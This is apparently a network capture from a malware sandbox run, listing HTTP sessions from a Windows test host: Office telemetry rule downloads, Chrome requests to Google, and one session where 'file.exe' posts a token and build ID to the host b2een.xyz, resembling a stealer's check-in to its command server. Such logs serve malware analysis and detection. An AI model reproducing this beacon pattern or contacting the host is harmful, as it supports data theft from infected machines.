2024-11-25 10:33:40 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:40 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:40 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: 15dd4eb7-201e-0051-500a-3d7340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103340Z-178bfbc474bwlrhlhC1NYCy3kg00000007eg00000000098w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:40 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.5	49767	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:40 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:40 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:40 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: 3074f9d5-701e-001e-47fc-3df5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103340Z-178bfbc474bmqmgjhC1NYCy16c00000007g0000000001hx1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:40 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.5	49769	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:42 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:42 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:42 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103342Z-174c587ffdfgcs66hC1TEB69cs00000005q0000000007kgh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:42 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49774	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:42 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:42 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 Data Ascii: ------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="token"6d45671cc31af7a6940de95c23332da3------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------BGIJJKKJJDAAAAAKFHJJCont
2024-11-25 10:33:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:33:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:33:43 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.5	49770	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:42 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:42 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:42 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 891407d0-301e-0096-28a6-3ee71d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103342Z-178bfbc474bbcwv4hC1NYCypys000000074g000000007wuu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:42 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.5	49771	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:42 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:42 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:42 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 1e280d2f-401e-0029-0d7f-3b9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103342Z-174c587ffdf89smkhC1TEB697s00000005ug00000000dtg8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:42 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.5	49772	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:42 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:42 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:42 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 482df903-301e-005d-4bb5-3ee448000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103342Z-178bfbc474bv587zhC1NYCny5w000000074000000000awwx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:42 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.5	49773	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:42 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:42 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:42 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 6b17e566-f01e-003f-7a44-3cd19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103342Z-178bfbc474bpnd5vhC1NYC4vr400000007eg0000000004wc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:42 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.5	49775	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:44 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:45 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:44 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: c42eb2d5-101e-008e-0701-3fcf88000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103344Z-174c587ffdfp4vpjhC1TEBybqw00000005r000000000gh2a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:45 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	49777	142.250.181.68	443	6020	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:44 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	49778	142.250.181.68	443	6020	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:44 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-25 10:33:45 UTC	1367	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:45 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-cyMQyOZLZ3koGaUKG91I6w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Save-Data Accept-CH: Downlink Accept-CH: ECT Accept-CH: RTT Accept-CH: Device-Memory Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-25 10:33:45 UTC	23	IN	Data Raw: 64 33 34 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 62 75 66 66 61 6c 6f Data Ascii: d34)]}'["",["buffalo
2024-11-25 10:33:45 UTC	1390	IN	Data Raw: 20 62 69 6c 6c 73 22 2c 22 70 72 6f 64 75 63 74 20 72 65 63 61 6c 6c 22 2c 22 77 69 63 6b 65 64 20 6d 6f 76 69 65 20 62 6f 78 20 6f 66 66 69 63 65 22 2c 22 74 68 65 20 65 61 72 74 68 20 74 69 6c 74 65 64 20 33 31 2e 35 20 69 6e 63 68 65 73 22 2c 22 68 79 75 6e 64 61 69 20 72 65 63 61 6c 6c 73 22 2c 22 61 70 20 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 72 61 6e 6b 69 6e 67 73 22 2c 22 62 65 73 74 20 32 30 32 34 20 63 68 72 69 73 74 6d 61 73 20 6d 6f 76 69 65 73 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 6f 6c 65 64 20 62 6c 61 63 6b 20 66 72 69 64 61 79 20 64 65 61 6c 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 Data Ascii: bills","product recall","wicked movie box office","the earth tilted 31.5 inches","hyundai recalls","ap college football rankings","best 2024 christmas movies","nintendo switch oled black friday deals"],["","","","","","","",""],[],{"google:clientdata":{"
2024-11-25 10:33:45 UTC	1390	IN	Data Raw: 54 4a 6b 51 6e 42 42 4d 45 31 75 4f 45 68 48 53 6a 68 78 4d 58 70 47 55 58 5a 50 63 6b 5a 5a 53 7a 41 34 63 7a 6c 77 53 6c 64 78 63 6c 5a 78 63 46 6c 6b 61 58 5a 49 63 47 78 4e 62 7a 6c 70 52 6c 4a 78 5a 47 31 79 61 7a 5a 51 57 56 42 4c 55 46 46 35 56 6d 31 6a 62 6c 70 48 53 6e 4a 55 59 55 4a 43 5a 48 55 76 4e 32 49 76 53 54 42 35 4e 57 5a 43 64 33 52 59 59 6e 6f 72 62 53 73 7a 59 6d 73 35 55 58 42 75 5a 57 73 76 54 79 39 59 4e 7a 6b 31 56 45 73 33 55 58 42 78 64 44 46 6d 5a 55 70 43 53 47 78 44 4d 7a 68 4e 62 6b 38 78 54 6d 78 31 61 6d 46 52 53 45 34 7a 4e 53 74 61 63 46 55 78 4e 57 6b 31 5a 6d 64 56 59 56 42 53 64 58 4e 49 61 6c 49 79 4d 32 31 4a 57 54 4e 78 4f 45 4e 73 53 6d 78 4c 62 57 74 58 54 48 64 54 64 31 5a 48 56 48 46 4c 63 46 6c 46 56 6a 46 43 Data Ascii: TJkQnBBME1uOEhHSjhxMXpGUXZPckZZSzA4czlwSldxclZxcFlkaXZIcGxNbzlpRlJxZG1yazZQWVBLUFF5Vm1jblpHSnJUYUJCZHUvN2IvSTB5NWZCd3RYYnorbSszYms5UXBuZWsvTy9YNzk1VEs3UXBxdDFmZUpCSGxDMzhNbk8xTmx1amFRSE4zNStacFUxNWk1ZmdVYVBSdXNIalIyM21JWTNxOENsSmxLbWtXTHdTd1ZHVHFLcFlFVjFC
